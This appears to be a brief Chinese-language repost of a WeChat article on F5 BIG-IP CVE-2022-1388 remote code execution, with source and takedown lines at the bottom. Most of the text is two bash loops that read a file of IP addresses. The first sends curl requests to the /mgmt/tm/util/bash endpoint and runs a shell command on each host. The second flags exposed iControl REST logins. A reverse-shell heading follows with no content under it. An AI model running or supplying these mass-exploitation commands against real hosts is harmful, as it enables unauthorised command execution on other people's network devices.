F5 BIG-IP(CVE-2022-1388) RCE

F5 BIG-IP(CVE-2022-1388) RCE
2022-5-11 11:6:15 Author: mp.weixin.qq.com(查看原文) 阅读量:55 收藏

检测

cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

cat ips.txt | while read host do; do curl -sk "https://$host/mgmt/shared/authn/login" | grep -q 'resterrorresponse' && printf "$host \0331;41mF5 iControl REST API Exposed\e[0m\n"; done

反弹shell

文章来源: http://mp.weixin.qq.com/s?__biz=MzA4MDMwMjQ3Mg==&mid=2651868088&idx=1&sn=e377f5f15382eb338881108514ed86fd&chksm=8442b35fb3353a49c2fb2289a94d7e907cbe3dd4e8540c2f281dbeaa370b3853c2cfba78b11f#rd
如有侵权请联系:admin#unsafe.sh